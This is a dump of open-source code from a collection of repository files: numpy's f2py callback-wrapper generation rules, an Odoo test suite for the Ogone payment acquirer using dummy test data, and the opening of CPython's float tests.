NO WARRANTY IS EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.
$Date: 2005/07/20 11:27:58 $
Pearu Peterson
"""
from __future__ import division, absolute_import, print_function
from . import __version__
from .auxfuncs import (
applyrules, debugcapi, dictappend, errmess, getargs, hasnote, isarray,
iscomplex, iscomplexarray, iscomplexfunction, isfunction, isintent_c,
isintent_hide, isintent_in, isintent_inout, isintent_nothide,
isintent_out, isoptional, isrequired, isscalar, isstring,
isstringfunction, issubroutine, l_and, l_not, l_or, outmess, replace,
stripcomma, throw_error
)
from . import cfuncs
f2py_version = __version__.version
################## Rules for callback function ##############
cb_routine_rules = {
'cbtypedefs': 'typedef #rctype#(*#name#_typedef)(#optargs_td##args_td##strarglens_td##noargs#);',
'body': """
#begintitle#
PyObject *#name#_capi = NULL;/*was Py_None*/
PyTupleObject *#name#_args_capi = NULL;
int #name#_nofargs = 0;
jmp_buf #name#_jmpbuf;
/*typedef #rctype#(*#name#_typedef)(#optargs_td##args_td##strarglens_td##noargs#);*/
#static# #rctype# #callbackname# (#optargs##args##strarglens##noargs#) {
\tPyTupleObject *capi_arglist = #name#_args_capi;
\tPyObject *capi_return = NULL;
\tPyObject *capi_tmp = NULL;
\tint capi_j,capi_i = 0;
\tint capi_longjmp_ok = 1;
#decl#
#ifdef F2PY_REPORT_ATEXIT
f2py_cb_start_clock();
#endif
\tCFUNCSMESS(\"cb:Call-back function #name# (maxnofargs=#maxnofargs#(-#nofoptargs#))\\n\");
\tCFUNCSMESSPY(\"cb:#name#_capi=\",#name#_capi);
\tif (#name#_capi==NULL) {
\t\tcapi_longjmp_ok = 0;
\t\t#name#_capi = PyObject_GetAttrString(#modulename#_module,\"#argname#\");
\t}
\tif (#name#_capi==NULL) {
\t\tPyErr_SetString(#modulename#_error,\"cb: Callback #argname# not defined (as an argument or module #modulename# attribute).\\n\");
\t\tgoto capi_fail;
\t}
\tif (F2PyCapsule_Check(#name#_capi)) {
\t#name#_typedef #name#_cptr;
\t#name#_cptr = F2PyCapsule_AsVoidPtr(#name#_capi);
\t#returncptr#(*#name#_cptr)(#optargs_nm##args_nm##strarglens_nm#);
\t#return#
\t}
\tif (capi_arglist==NULL) {
\t\tcapi_longjmp_ok = 0;
\t\tcapi_tmp = PyObject_GetAttrString(#modulename#_module,\"#argname#_extra_args\");
\t\tif (capi_tmp) {
\t\t\tcapi_arglist = (PyTupleObject *)PySequence_Tuple(capi_tmp);
\t\t\tif (capi_arglist==NULL) {
\t\t\t\tPyErr_SetString(#modulename#_error,\"Failed to convert #modulename#.#argname#_extra_args to tuple.\\n\");
\t\t\t\tgoto capi_fail;
\t\t\t}
\t\t} else {
\t\t\tPyErr_Clear();
\t\t\tcapi_arglist = (PyTupleObject *)Py_BuildValue(\"()\");
\t\t}
\t}
\tif (capi_arglist == NULL) {
\t\tPyErr_SetString(#modulename#_error,\"Callback #argname# argument list is not set.\\n\");
\t\tgoto capi_fail;
\t}
#setdims#
#pyobjfrom#
\tCFUNCSMESSPY(\"cb:capi_arglist=\",capi_arglist);
\tCFUNCSMESS(\"cb:Call-back calling Python function #argname#.\\n\");
#ifdef F2PY_REPORT_ATEXIT
f2py_cb_start_call_clock();
#endif
\tcapi_return = PyObject_CallObject(#name#_capi,(PyObject *)capi_arglist);
#ifdef F2PY_REPORT_ATEXIT
f2py_cb_stop_call_clock();
#endif
\tCFUNCSMESSPY(\"cb:capi_return=\",capi_return);
\tif (capi_return == NULL) {
\t\tfprintf(stderr,\"capi_return is NULL\\n\");
\t\tgoto capi_fail;
\t}
\tif (capi_return == Py_None) {
\t\tPy_DECREF(capi_return);
\t\tcapi_return = Py_BuildValue(\"()\");
\t}
\telse if (!PyTuple_Check(capi_return)) {
\t\tcapi_return = Py_BuildValue(\"(N)\",capi_return);
\t}
\tcapi_j = PyTuple_Size(capi_return);
\tcapi_i = 0;
#frompyobj#
\tCFUNCSMESS(\"cb:#name#:successful\\n\");
\tPy_DECREF(capi_return);
#ifdef F2PY_REPORT_ATEXIT
f2py_cb_stop_clock();
#endif
\tgoto capi_return_pt;
capi_fail:
\tfprintf(stderr,\"Call-back #name# failed.\\n\");
\tPy_XDECREF(capi_return);
\tif (capi_longjmp_ok)
\t\tlongjmp(#name#_jmpbuf,-1);
capi_return_pt:
\t;
#return#
}
#endtitle#
""",
'need': ['setjmp.h', 'CFUNCSMESS'],
'maxnofargs': '#maxnofargs#',
'nofoptargs': '#nofoptargs#',
'docstr': """\
\tdef #argname#(#docsignature#): return #docreturn#\\n\\
#docstrsigns#""",
'latexdocstr': """
{{}\\verb@def #argname#(#latexdocsignature#): return #docreturn#@{}}
#routnote#
#latexdocstrsigns#""",
'docstrshort': 'def #argname#(#docsignature#): return #docreturn#'
}
cb_rout_rules = [
{ # Init
'separatorsfor': {'decl': '\n',
'args': ',', 'optargs': '', 'pyobjfrom': '\n', 'freemem': '\n',
'args_td': ',', 'optargs_td': '',
'args_nm': ',', 'optargs_nm': '',
'frompyobj': '\n', 'setdims': '\n',
'docstrsigns': '\\n"\n"',
'latexdocstrsigns': '\n',
'latexdocstrreq': '\n', 'latexdocstropt': '\n',
'latexdocstrout': '\n', 'latexdocstrcbs': '\n',
},
'decl': '/*decl*/', 'pyobjfrom': '/*pyobjfrom*/', 'frompyobj': '/*frompyobj*/',
'args': [], 'optargs': '', 'return': '', 'strarglens': '', 'freemem': '/*freemem*/',
'args_td': [], 'optargs_td': '', 'strarglens_td': '',
'args_nm': [], 'optargs_nm': '', 'strarglens_nm': '',
'noargs': '',
'setdims': '/*setdims*/',
'docstrsigns': '', 'latexdocstrsigns': '',
'docstrreq': '\tRequired arguments:',
'docstropt': '\tOptional arguments:',
'docstrout': '\tReturn objects:',
'docstrcbs': '\tCall-back functions:',
'docreturn': '', 'docsign': '', 'docsignopt': '',
'latexdocstrreq': '\\noindent Required arguments:',
'latexdocstropt': '\\noindent Optional arguments:',
'latexdocstrout': '\\noindent Return objects:',
'latexdocstrcbs': '\\noindent Call-back functions:',
'routnote': {hasnote: '--- #note#', l_not(hasnote): ''},
}, { # Function
'decl': '\t#ctype# return_value;',
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting return_value->");'},
'\tif (capi_j>capi_i)\n\t\tGETSCALARFROMPYTUPLE(capi_return,capi_i++,&return_value,#ctype#,"#ctype#_from_pyobj failed in converting return_value of call-back function #name# to C #ctype#\\n");',
{debugcapi:
'\tfprintf(stderr,"#showvalueformat#.\\n",return_value);'}
],
'need': ['#ctype#_from_pyobj', {debugcapi: 'CFUNCSMESS'}, 'GETSCALARFROMPYTUPLE'],
'return': '\treturn return_value;',
'_check': l_and(isfunction, l_not(isstringfunction), l_not(iscomplexfunction))
},
{ # String function
'pyobjfrom': {debugcapi: '\tfprintf(stderr,"debug-capi:cb:#name#:%d:\\n",return_value_len);'},
'args': '#ctype# return_value,int return_value_len',
'args_nm': 'return_value,&return_value_len',
'args_td': '#ctype# ,int',
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting return_value->\\"");'},
"""\tif (capi_j>capi_i)
\t\tGETSTRFROMPYTUPLE(capi_return,capi_i++,return_value,return_value_len);""",
{debugcapi:
'\tfprintf(stderr,"#showvalueformat#\\".\\n",return_value);'}
],
'need': ['#ctype#_from_pyobj', {debugcapi: 'CFUNCSMESS'},
'string.h', 'GETSTRFROMPYTUPLE'],
'return': 'return;',
'_check': isstringfunction
},
{ # Complex function
'optargs': """
#ifndef F2PY_CB_RETURNCOMPLEX
#ctype# *return_value
#endif
""",
'optargs_nm': """
#ifndef F2PY_CB_RETURNCOMPLEX
return_value
#endif
""",
'optargs_td': """
#ifndef F2PY_CB_RETURNCOMPLEX
#ctype# *
#endif
""",
'decl': """
#ifdef F2PY_CB_RETURNCOMPLEX
\t#ctype# return_value;
#endif
""",
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting return_value->");'},
"""\
\tif (capi_j>capi_i)
#ifdef F2PY_CB_RETURNCOMPLEX
\t\tGETSCALARFROMPYTUPLE(capi_return,capi_i++,&return_value,#ctype#,\"#ctype#_from_pyobj failed in converting return_value of call-back function #name# to C #ctype#\\n\");
#else
\t\tGETSCALARFROMPYTUPLE(capi_return,capi_i++,return_value,#ctype#,\"#ctype#_from_pyobj failed in converting return_value of call-back function #name# to C #ctype#\\n\");
#endif
""",
{debugcapi: """
#ifdef F2PY_CB_RETURNCOMPLEX
\tfprintf(stderr,\"#showvalueformat#.\\n\",(return_value).r,(return_value).i);
#else
\tfprintf(stderr,\"#showvalueformat#.\\n\",(*return_value).r,(*return_value).i);
#endif
"""}
],
'return': """
#ifdef F2PY_CB_RETURNCOMPLEX
\treturn return_value;
#else
\treturn;
#endif
""",
'need': ['#ctype#_from_pyobj', {debugcapi: 'CFUNCSMESS'},
'string.h', 'GETSCALARFROMPYTUPLE', '#ctype#'],
'_check': iscomplexfunction
},
{'docstrout': '\t\t#pydocsignout#',
'latexdocstrout': ['\\item[]{{}\\verb@#pydocsignout#@{}}',
{hasnote: '--- #note#'}],
'docreturn': '#rname#,',
'_check': isfunction},
{'_check': issubroutine, 'return': 'return;'}
]
cb_arg_rules = [
{ # Doc
'docstropt': {l_and(isoptional, isintent_nothide): '\t\t#pydocsign#'},
'docstrreq': {l_and(isrequired, isintent_nothide): '\t\t#pydocsign#'},
'docstrout': {isintent_out: '\t\t#pydocsignout#'},
'latexdocstropt': {l_and(isoptional, isintent_nothide): ['\\item[]{{}\\verb@#pydocsign#@{}}',
{hasnote: '--- #note#'}]},
'latexdocstrreq': {l_and(isrequired, isintent_nothide): ['\\item[]{{}\\verb@#pydocsign#@{}}',
{hasnote: '--- #note#'}]},
'latexdocstrout': {isintent_out: ['\\item[]{{}\\verb@#pydocsignout#@{}}',
{l_and(hasnote, isintent_hide): '--- #note#',
l_and(hasnote, isintent_nothide): '--- See above.'}]},
'docsign': {l_and(isrequired, isintent_nothide): '#varname#,'},
'docsignopt': {l_and(isoptional, isintent_nothide): '#varname#,'},
'depend': ''
},
{
'args': {
l_and(isscalar, isintent_c): '#ctype# #varname_i#',
l_and(isscalar, l_not(isintent_c)): '#ctype# *#varname_i#_cb_capi',
isarray: '#ctype# *#varname_i#',
isstring: '#ctype# #varname_i#'
},
'args_nm': {
l_and(isscalar, isintent_c): '#varname_i#',
l_and(isscalar, l_not(isintent_c)): '#varname_i#_cb_capi',
isarray: '#varname_i#',
isstring: '#varname_i#'
},
'args_td': {
l_and(isscalar, isintent_c): '#ctype#',
l_and(isscalar, l_not(isintent_c)): '#ctype# *',
isarray: '#ctype# *',
isstring: '#ctype#'
},
# untested with multiple args
'strarglens': {isstring: ',int #varname_i#_cb_len'},
'strarglens_td': {isstring: ',int'}, # untested with multiple args
# untested with multiple args
'strarglens_nm': {isstring: ',#varname_i#_cb_len'},
},
{ # Scalars
'decl': {l_not(isintent_c): '\t#ctype# #varname_i#=(*#varname_i#_cb_capi);'},
'error': {l_and(isintent_c, isintent_out,
throw_error('intent(c,out) is forbidden for callback scalar arguments')):
''},
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting #varname#->");'},
{isintent_out:
'\tif (capi_j>capi_i)\n\t\tGETSCALARFROMPYTUPLE(capi_return,capi_i++,#varname_i#_cb_capi,#ctype#,"#ctype#_from_pyobj failed in converting argument #varname# of call-back function #name# to C #ctype#\\n");'},
{l_and(debugcapi, l_and(l_not(iscomplex), isintent_c)):
'\tfprintf(stderr,"#showvalueformat#.\\n",#varname_i#);'},
{l_and(debugcapi, l_and(l_not(iscomplex), l_not( isintent_c))):
'\tfprintf(stderr,"#showvalueformat#.\\n",*#varname_i#_cb_capi);'},
{l_and(debugcapi, l_and(iscomplex, isintent_c)):
'\tfprintf(stderr,"#showvalueformat#.\\n",(#varname_i#).r,(#varname_i#).i);'},
{l_and(debugcapi, l_and(iscomplex, l_not( isintent_c))):
'\tfprintf(stderr,"#showvalueformat#.\\n",(*#varname_i#_cb_capi).r,(*#varname_i#_cb_capi).i);'},
],
'need': [{isintent_out: ['#ctype#_from_pyobj', 'GETSCALARFROMPYTUPLE']},
{debugcapi: 'CFUNCSMESS'}],
'_check': isscalar
}, {
'pyobjfrom': [{isintent_in: """\
\tif (#name#_nofargs>capi_i)
\t\tif (PyTuple_SetItem((PyObject *)capi_arglist,capi_i++,pyobj_from_#ctype#1(#varname_i#)))
\t\t\tgoto capi_fail;"""},
{isintent_inout: """\
\tif (#name#_nofargs>capi_i)
\t\tif (PyTuple_SetItem((PyObject *)capi_arglist,capi_i++,pyarr_from_p_#ctype#1(#varname_i#_cb_capi)))
\t\t\tgoto capi_fail;"""}],
'need': [{isintent_in: 'pyobj_from_#ctype#1'},
{isintent_inout: 'pyarr_from_p_#ctype#1'},
{iscomplex: '#ctype#'}],
'_check': l_and(isscalar, isintent_nothide),
'_optional': ''
}, { # String
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting #varname#->\\"");'},
"""\tif (capi_j>capi_i)
\t\tGETSTRFROMPYTUPLE(capi_return,capi_i++,#varname_i#,#varname_i#_cb_len);""",
{debugcapi:
'\tfprintf(stderr,"#showvalueformat#\\":%d:.\\n",#varname_i#,#varname_i#_cb_len);'},
],
'need': ['#ctype#', 'GETSTRFROMPYTUPLE',
{debugcapi: 'CFUNCSMESS'}, 'string.h'],
'_check': l_and(isstring, isintent_out)
}, {
'pyobjfrom': [{debugcapi: '\tfprintf(stderr,"debug-capi:cb:#varname#=\\"#showvalueformat#\\":%d:\\n",#varname_i#,#varname_i#_cb_len);'},
{isintent_in: """\
\tif (#name#_nofargs>capi_i)
\t\tif (PyTuple_SetItem((PyObject *)capi_arglist,capi_i++,pyobj_from_#ctype#1size(#varname_i#,#varname_i#_cb_len)))
\t\t\tgoto capi_fail;"""},
{isintent_inout: """\
\tif (#name#_nofargs>capi_i) {
\t\tint #varname_i#_cb_dims[] = {#varname_i#_cb_len};
\t\tif (PyTuple_SetItem((PyObject *)capi_arglist,capi_i++,pyarr_from_p_#ctype#1(#varname_i#,#varname_i#_cb_dims)))
\t\t\tgoto capi_fail;
\t}"""}],
'need': [{isintent_in: 'pyobj_from_#ctype#1size'},
{isintent_inout: 'pyarr_from_p_#ctype#1'}],
'_check': l_and(isstring, isintent_nothide),
'_optional': ''
},
# Array ...
{
'decl': '\tnpy_intp #varname_i#_Dims[#rank#] = {#rank*[-1]#};',
'setdims': '\t#cbsetdims#;',
'_check': isarray,
'_depend': ''
},
{
'pyobjfrom': [{debugcapi: '\tfprintf(stderr,"debug-capi:cb:#varname#\\n");'},
{isintent_c: """\
\tif (#name#_nofargs>capi_i) {
\t\tPyArrayObject *tmp_arr = (PyArrayObject *)PyArray_New(&PyArray_Type,#rank#,#varname_i#_Dims,#atype#,NULL,(char*)#varname_i#,0,NPY_ARRAY_CARRAY,NULL); /*XXX: Hmm, what will destroy this array??? */
""",
l_not(isintent_c): """\
\tif (#name#_nofargs>capi_i) {
\t\tPyArrayObject *tmp_arr = (PyArrayObject *)PyArray_New(&PyArray_Type,#rank#,#varname_i#_Dims,#atype#,NULL,(char*)#varname_i#,0,NPY_ARRAY_FARRAY,NULL); /*XXX: Hmm, what will destroy this array??? */
""",
},
"""
\t\tif (tmp_arr==NULL)
\t\t\tgoto capi_fail;
\t\tif (PyTuple_SetItem((PyObject *)capi_arglist,capi_i++,(PyObject *)tmp_arr))
\t\t\tgoto capi_fail;
}"""],
'_check': l_and(isarray, isintent_nothide, l_or(isintent_in, isintent_inout)),
'_optional': '',
}, {
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting #varname#->");'},
"""\tif (capi_j>capi_i) {
\t\tPyArrayObject *rv_cb_arr = NULL;
\t\tif ((capi_tmp = PyTuple_GetItem(capi_return,capi_i++))==NULL) goto capi_fail;
\t\trv_cb_arr = array_from_pyobj(#atype#,#varname_i#_Dims,#rank#,F2PY_INTENT_IN""",
{isintent_c: '|F2PY_INTENT_C'},
""",capi_tmp);
\t\tif (rv_cb_arr == NULL) {
\t\t\tfprintf(stderr,\"rv_cb_arr is NULL\\n\");
\t\t\tgoto capi_fail;
\t\t}
\t\tMEMCOPY(#varname_i#,PyArray_DATA(rv_cb_arr),PyArray_NBYTES(rv_cb_arr));
\t\tif (capi_tmp != (PyObject *)rv_cb_arr) {
\t\t\tPy_DECREF(rv_cb_arr);
\t\t}
\t}""",
{debugcapi: '\tfprintf(stderr,"<-.\\n");'},
],
'need': ['MEMCOPY', {iscomplexarray: '#ctype#'}],
'_check': l_and(isarray, isintent_out)
}, {
'docreturn': '#varname#,',
'_check': isintent_out
}
]
################## Build call-back module #############
cb_map = {}
def buildcallbacks(m):
global cb_map
cb_map[m['name']] = []
for bi in m['body']:
if bi['block'] == 'interface':
for b in bi['body']:
if b:
buildcallback(b, m['name'])
else:
errmess('warning: empty body for %s\n' % (m['name']))
def buildcallback(rout, um):
global cb_map
from . import capi_maps
outmess('\tConstructing call-back function "cb_%s_in_%s"\n' %
(rout['name'], um))
args, depargs = getargs(rout)
capi_maps.depargs = depargs
var = rout['vars']
vrd = capi_maps.cb_routsign2map(rout, um)
rd = dictappend({}, vrd)
cb_map[um].append([rout['name'], rd['name']])
for r in cb_rout_rules:
if ('_check' in r and r['_check'](rout)) or ('_check' not in r):
ar = applyrules(r, vrd, rout)
rd = dictappend(rd, ar)
savevrd = {}
for i, a in enumerate(args):
vrd = capi_maps.cb_sign2map(a, var[a], index=i)
savevrd[a] = vrd
for r in cb_arg_rules:
if '_depend' in r:
continue
if '_optional' in r and isoptional(var[a]):
continue
if ('_check' in r and r['_check'](var[a])) or ('_check' not in r):
ar = applyrules(r, vrd, var[a])
rd = dictappend(rd, ar)
if '_break' in r:
break
for a in args:
vrd = savevrd[a]
for r in cb_arg_rules:
if '_depend' in r:
continue
if ('_optional' not in r) or ('_optional' in r and isrequired(var[a])):
continue
if ('_check' in r and r['_check'](var[a])) or ('_check' not in r):
ar = applyrules(r, vrd, var[a])
rd = dictappend(rd, ar)
if '_break' in r:
break
for a in depargs:
vrd = savevrd[a]
for r in cb_arg_rules:
if '_depend' not in r:
continue
if '_optional' in r:
continue
if ('_check' in r and r['_check'](var[a])) or ('_check' not in r):
ar = applyrules(r, vrd, var[a])
rd = dictappend(rd, ar)
if '_break' in r:
break
if 'args' in rd and 'optargs' in rd:
if isinstance(rd['optargs'], list):
rd['optargs'] = rd['optargs'] + ["""
#ifndef F2PY_CB_RETURNCOMPLEX
,
#endif
"""]
rd['optargs_nm'] = rd['optargs_nm'] + ["""
#ifndef F2PY_CB_RETURNCOMPLEX
,
#endif
"""]
rd['optargs_td'] = rd['optargs_td'] + ["""
#ifndef F2PY_CB_RETURNCOMPLEX
,
#endif
"""]
if isinstance(rd['docreturn'], list):
rd['docreturn'] = stripcomma(
replace('#docreturn#', {'docreturn': rd['docreturn']}))
optargs = stripcomma(replace('#docsignopt#',
{'docsignopt': rd['docsignopt']}
))
if optargs == '':
rd['docsignature'] = stripcomma(
replace('#docsign#', {'docsign': rd['docsign']}))
else:
rd['docsignature'] = replace('#docsign#[#docsignopt#]',
{'docsign': rd['docsign'],
'docsignopt': optargs,
})
rd['latexdocsignature'] = rd['docsignature'].replace('_', '\\_')
rd['latexdocsignature'] = rd['latexdocsignature'].replace(',', ', ')
rd['docstrsigns'] = []
rd['latexdocstrsigns'] = []
for k in ['docstrreq', 'docstropt', 'docstrout', 'docstrcbs']:
if k in rd and isinstance(rd[k], list):
rd['docstrsigns'] = rd['docstrsigns'] + rd[k]
k = 'latex' + k
if k in rd and isinstance(rd[k], list):
rd['latexdocstrsigns'] = rd['latexdocstrsigns'] + rd[k][0:1] +\
['\\begin{description}'] + rd[k][1:] +\
['\\end{description}']
if 'args' not in rd:
rd['args'] = ''
rd['args_td'] = ''
rd['args_nm'] = ''
if not (rd.get('args') or rd.get('optargs') or rd.get('strarglens')):
rd['noargs'] = 'void'
ar = applyrules(cb_routine_rules, rd)
cfuncs.callbacks[rd['name']] = ar['body']
if isinstance(ar['need'], str):
ar['need'] = [ar['need']]
if 'need' in rd:
for t in cfuncs.typedefs.keys():
if t in rd['need']:
ar['need'].append(t)
cfuncs.typedefs_generated[rd['name'] + '_typedef'] = ar['cbtypedefs']
ar['need'].append(rd['name'] + '_typedef')
cfuncs.needs[rd['name']] = ar['need']
capi_maps.lcb2_map[rd['name']] = {'maxnofargs': ar['maxnofargs'],
'nofoptargs': ar['nofoptargs'],
'docstr': ar['docstr'],
'latexdocstr': ar['latexdocstr'],
'argname': rd['argname']
}
outmess('\t %s\n' % (ar['docstrshort']))
return
################## Build call-back function #############
| bsd-3-clause |
alexcuellar/odoo | addons/payment_ogone/tests/test_ogone.py | 430 | 9309 | # -*- coding: utf-8 -*-
from lxml import objectify
import time
import urlparse
from openerp.addons.payment.models.payment_acquirer import ValidationError
from openerp.addons.payment.tests.common import PaymentAcquirerCommon
from openerp.addons.payment_ogone.controllers.main import OgoneController
from openerp.tools import mute_logger
class OgonePayment(PaymentAcquirerCommon):
def setUp(self):
super(OgonePayment, self).setUp()
cr, uid = self.cr, self.uid
self.base_url = self.registry('ir.config_parameter').get_param(cr, uid, 'web.base.url')
# get the adyen account
model, self.ogone_id = self.registry('ir.model.data').get_object_reference(cr, uid, 'payment_ogone', 'payment_acquirer_ogone')
def test_10_ogone_form_render(self):
cr, uid, context = self.cr, self.uid, {}
# be sure not to do stupid thing
ogone = self.payment_acquirer.browse(self.cr, self.uid, self.ogone_id, None)
self.assertEqual(ogone.environment, 'test', 'test without test environment')
# ----------------------------------------
# Test: button direct rendering + shasign
# ----------------------------------------
form_values = {
'PSPID': 'dummy',
'ORDERID': 'test_ref0',
'AMOUNT': '1',
'CURRENCY': 'EUR',
'LANGUAGE': 'en_US',
'CN': 'Norbert Buyer',
'EMAIL': '[email protected]',
'OWNERZIP': '1000',
'OWNERADDRESS': 'Huge Street 2/543',
'OWNERCTY': 'Belgium',
'OWNERTOWN': 'Sin City',
'OWNERTELNO': '0032 12 34 56 78',
'SHASIGN': '815f67b8ff70d234ffcf437c13a9fa7f807044cc',
'ACCEPTURL': '%s' % urlparse.urljoin(self.base_url, OgoneController._accept_url),
'DECLINEURL': '%s' % urlparse.urljoin(self.base_url, OgoneController._decline_url),
'EXCEPTIONURL': '%s' % urlparse.urljoin(self.base_url, OgoneController._exception_url),
'CANCELURL': '%s' % urlparse.urljoin(self.base_url, OgoneController._cancel_url),
}
# render the button
res = self.payment_acquirer.render(
cr, uid, self.ogone_id,
'test_ref0', 0.01, self.currency_euro_id,
partner_id=None,
partner_values=self.buyer_values,
context=context)
# check form result
tree = objectify.fromstring(res)
self.assertEqual(tree.get('action'), 'https://secure.ogone.com/ncol/test/orderstandard.asp', 'ogone: wrong form POST url')
for form_input in tree.input:
if form_input.get('name') in ['submit']:
continue
self.assertEqual(
form_input.get('value'),
form_values[form_input.get('name')],
'ogone: wrong value for input %s: received %s instead of %s' % (form_input.get('name'), form_input.get('value'), form_values[form_input.get('name')])
)
# ----------------------------------------
# Test2: button using tx + validation
# ----------------------------------------
# create a new draft tx
tx_id = self.payment_transaction.create(
cr, uid, {
'amount': 0.01,
'acquirer_id': self.ogone_id,
'currency_id': self.currency_euro_id,
'reference': 'test_ref0',
'partner_id': self.buyer_id,
}, context=context
)
# render the button
res = self.payment_acquirer.render(
cr, uid, self.ogone_id,
'should_be_erased', 0.01, self.currency_euro,
tx_id=tx_id,
partner_id=None,
partner_values=self.buyer_values,
context=context)
# check form result
tree = objectify.fromstring(res)
self.assertEqual(tree.get('action'), 'https://secure.ogone.com/ncol/test/orderstandard.asp', 'ogone: wrong form POST url')
for form_input in tree.input:
if form_input.get('name') in ['submit']:
continue
self.assertEqual(
form_input.get('value'),
form_values[form_input.get('name')],
'ogone: wrong value for form input %s: received %s instead of %s' % (form_input.get('name'), form_input.get('value'), form_values[form_input.get('name')])
)
@mute_logger('openerp.addons.payment_ogone.models.ogone', 'ValidationError')
def test_20_ogone_form_management(self):
cr, uid, context = self.cr, self.uid, {}
# be sure not to do stupid thing
ogone = self.payment_acquirer.browse(self.cr, self.uid, self.ogone_id, None)
self.assertEqual(ogone.environment, 'test', 'test without test environment')
# typical data posted by ogone after client has successfully paid
ogone_post_data = {
'orderID': u'test_ref_2',
'STATUS': u'9',
'CARDNO': u'XXXXXXXXXXXX0002',
'PAYID': u'25381582',
'CN': u'Norbert Buyer',
'NCERROR': u'0',
'TRXDATE': u'11/15/13',
'IP': u'85.201.233.72',
'BRAND': u'VISA',
'ACCEPTANCE': u'test123',
'currency': u'EUR',
'amount': u'1.95',
'SHASIGN': u'7B7B0ED9CBC4A85543A9073374589033A62A05A5',
'ED': u'0315',
'PM': u'CreditCard'
}
# should raise error about unknown tx
with self.assertRaises(ValidationError):
self.payment_transaction.ogone_form_feedback(cr, uid, ogone_post_data, context=context)
# create tx
tx_id = self.payment_transaction.create(
cr, uid, {
'amount': 1.95,
'acquirer_id': self.ogone_id,
'currency_id': self.currency_euro_id,
'reference': 'test_ref_2',
'partner_name': 'Norbert Buyer',
'partner_country_id': self.country_france_id,
}, context=context
)
# validate it
self.payment_transaction.ogone_form_feedback(cr, uid, ogone_post_data, context=context)
# check state
tx = self.payment_transaction.browse(cr, uid, tx_id, context=context)
self.assertEqual(tx.state, 'done', 'ogone: validation did not put tx into done state')
self.assertEqual(tx.ogone_payid, ogone_post_data.get('PAYID'), 'ogone: validation did not update tx payid')
# reset tx
tx.write({'state': 'draft', 'date_validate': False, 'ogone_payid': False})
# now ogone post is ok: try to modify the SHASIGN
ogone_post_data['SHASIGN'] = 'a4c16bae286317b82edb49188d3399249a784691'
with self.assertRaises(ValidationError):
self.payment_transaction.ogone_form_feedback(cr, uid, ogone_post_data, context=context)
# simulate an error
ogone_post_data['STATUS'] = 2
ogone_post_data['SHASIGN'] = 'a4c16bae286317b82edb49188d3399249a784691'
self.payment_transaction.ogone_form_feedback(cr, uid, ogone_post_data, context=context)
# check state
tx = self.payment_transaction.browse(cr, uid, tx_id, context=context)
self.assertEqual(tx.state, 'error', 'ogone: erroneous validation did not put tx into error state')
def test_30_ogone_s2s(self):
test_ref = 'test_ref_%.15f' % time.time()
cr, uid, context = self.cr, self.uid, {}
# be sure not to do stupid thing
ogone = self.payment_acquirer.browse(self.cr, self.uid, self.ogone_id, None)
self.assertEqual(ogone.environment, 'test', 'test without test environment')
# create a new draft tx
tx_id = self.payment_transaction.create(
cr, uid, {
'amount': 0.01,
'acquirer_id': self.ogone_id,
'currency_id': self.currency_euro_id,
'reference': test_ref,
'partner_id': self.buyer_id,
'type': 'server2server',
}, context=context
)
# create an alias
res = self.payment_transaction.ogone_s2s_create_alias(
cr, uid, tx_id, {
'expiry_date_mm': '01',
'expiry_date_yy': '2015',
'holder_name': 'Norbert Poilu',
'number': '4000000000000002',
'brand': 'VISA',
}, context=context)
# check an alias is set, containing at least OPENERP
tx = self.payment_transaction.browse(cr, uid, tx_id, context=context)
self.assertIn('OPENERP', tx.partner_reference, 'ogone: wrong partner reference after creating an alias')
res = self.payment_transaction.ogone_s2s_execute(cr, uid, tx_id, {}, context=context)
# print res
# {
# 'orderID': u'reference',
# 'STATUS': u'9',
# 'CARDNO': u'XXXXXXXXXXXX0002',
# 'PAYID': u'24998692',
# 'CN': u'Norbert Poilu',
# 'NCERROR': u'0',
# 'TRXDATE': u'11/05/13',
# 'IP': u'85.201.233.72',
# 'BRAND': u'VISA',
# 'ACCEPTANCE': u'test123',
# 'currency': u'EUR',
# 'amount': u'1.95',
# 'SHASIGN': u'EFDC56879EF7DE72CCF4B397076B5C9A844CB0FA',
# 'ED': u'0314',
# 'PM': u'CreditCard'
# }
| agpl-3.0 |
dennis-sheil/commandergenius | project/jni/python/src/Lib/test/test_float.py | 51 | 33323 |
import unittest, struct
import os
from test import test_support
import math
from math import isinf, isnan, copysign, ldexp
import operator
import random, fractions
INF = float("inf")
NAN = float("nan")
class GeneralFloatCases(unittest.TestCase):
def test_float(self):
self.assertEqual(float(3.14), 3.14)
self.assertEqual(float(314), 314.0)
self.assertEqual(float(314L), 314.0)
self.assertEqual(float(" 3.14 "), 3.14)
self.assertRaises(ValueError, float, " 0x3.1 ")
self.assertRaises(ValueError, float, " -0x3.p-1 ")
self.assertRaises(ValueError, float, " +0x3.p-1 ")
self.assertRaises(ValueError, float, "++3.14")
self.assertRaises(ValueError, float, "+-3.14")
self.assertRaises(ValueError, float, "-+3.14")
self.assertRaises(ValueError, float, "--3.14")
if test_support.have_unicode:
self.assertEqual(float(unicode(" 3.14 ")), 3.14)
self.assertEqual(float(unicode(" \u0663.\u0661\u0664 ",'raw-unicode-escape')), 3.14)
# Implementation limitation in PyFloat_FromString()
self.assertRaises(ValueError, float, unicode("1"*10000))
@test_support.run_with_locale('LC_NUMERIC', 'fr_FR', 'de_DE')
def test_float_with_comma(self):
# set locale to something that doesn't use '.' for the decimal point
# float must not accept the locale specific decimal point but
# it still has to accept the normal python syntac
import locale
if not locale.localeconv()['decimal_point'] == ',':
return
self.assertEqual(float(" 3.14 "), 3.14)
self.assertEqual(float("+3.14 "), 3.14)
self.assertEqual(float("-3.14 "), -3.14)
self.assertEqual(float(".14 "), .14)
self.assertEqual(float("3. "), 3.0)
self.assertEqual(float("3.e3 "), 3000.0)
self.assertEqual(float("3.2e3 "), 3200.0)
self.assertEqual(float("2.5e-1 "), 0.25)
self.assertEqual(float("5e-1"), 0.5)
self.assertRaises(ValueError, float, " 3,14 ")
self.assertRaises(ValueError, float, " +3,14 ")
self.assertRaises(ValueError, float, " -3,14 ")
self.assertRaises(ValueError, float, " 0x3.1 ")
self.assertRaises(ValueError, float, " -0x3.p-1 ")
self.assertRaises(ValueError, float, " +0x3.p-1 ")
